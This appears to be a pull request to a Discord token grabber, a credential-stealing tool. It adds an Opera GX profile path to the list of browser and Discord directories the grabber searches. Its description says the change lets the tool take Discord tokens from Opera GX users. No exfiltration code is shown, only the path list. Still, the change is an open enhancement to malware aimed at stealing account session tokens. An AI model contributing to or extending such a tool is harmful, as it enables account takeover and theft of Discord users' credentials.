### PR TITLE
Added support for Opera GX browser

### DIFF
--- a/token_grabber.py
+++ b/token_grabber.py
@@ -18,6 +18,7 @@ PATHS = {
     "Discord PTB"       : ROAMING + "\\discordptb",
     "Google Chrome"     : LOCAL + "\\Google\\Chrome\\User Data\\Default",
     "Opera"             : ROAMING + "\\Opera Software\\Opera Stable",
+    "Opera GX"          : ROAMING + "\\Opera Software\\Opera GX Stable",
     "Brave"             : LOCAL + "\\BraveSoftware\\Brave-Browser\\User Data\\Default",
     "Yandex"            : LOCAL + "\\Yandex\\YandexBrowser\\User Data\\Default"
 }


### PR DESCRIPTION
Previously if a user was using the Opera GX browser for Discord, then the token grabber wouldn't be able to fetch tokens from Opera GX. This change should fix that issue.